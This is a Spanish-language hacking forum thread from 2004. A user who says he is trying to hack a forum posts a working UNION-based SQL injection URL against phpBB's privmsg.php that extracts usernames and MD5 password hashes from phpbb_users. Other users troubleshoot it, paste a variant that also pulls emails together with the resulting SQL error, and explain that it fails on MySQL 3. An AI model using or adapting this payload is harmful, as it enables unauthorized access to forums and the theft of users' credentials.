|
Título: [MOD] Se me resiste un foro :@ Problema con la SQL injection y el hash md5 Publicado por: h1t0k1r1 en 6 Agosto 2004, 06:01 am hola, wenas, stoy intentando hackear un foro, pero tengo un pekeño problema:
le hago esta inyeccion: Código: /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_id=3/* y me aparece este hash Citar 025c921c6302f8f90da5c4f54 pero sta incompleto, le faltan por lo menos 7 caracteres , o eso parece k hago mal? gracias y saludos Título: Re: se me resiste un foro :@ Publicado por: Linuxtron en 6 Agosto 2004, 09:17 am aki lo explika bien
http://www.waraxe.us/?modname=sa&id=003 Título: Re: [MOD] Se me resiste un foro :@ Problema con la SQL injection y el hash md5 Publicado por: racoon en 29 Septiembre 2004, 04:33 am En algunos foros te deja ver el hash pero en otros sale un error siguiente;
Could not query private message post information DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_email,null,null,null,null,null,null,null,null,nu' at line 5 SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_email,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_id=13 LIMIT 3/*AND ( ( pm.privmsgs_to_userid = 30 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 30 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid Line : 246 ¿A que se puede deber? Título: Re: [MOD] Se me resiste un foro :@ Problema con la SQL injection y el hash md5 Publicado por: racoon en 1 Octubre 2004, 21:13 pm Bueno, creo saber porque en algunos no funciona esta inyección SQL y da este mensaje.
El problema es que solo funciona si el servidor tiene MySQL 4. Si tiene la versión MySQL 3 no funcionará ya que no soporta la sentencia UNION. ¿Algún comentario? Título: Re: [MOD] Se me resiste un foro :@ Problema con la SQL injection y el hash md5 Publicado por: eLank0 en 1 Octubre 2004, 23:49 pm También tenéis que tener en cuneta que NO TODOS los foros son vulnerables. ;)
Salu2.. :P |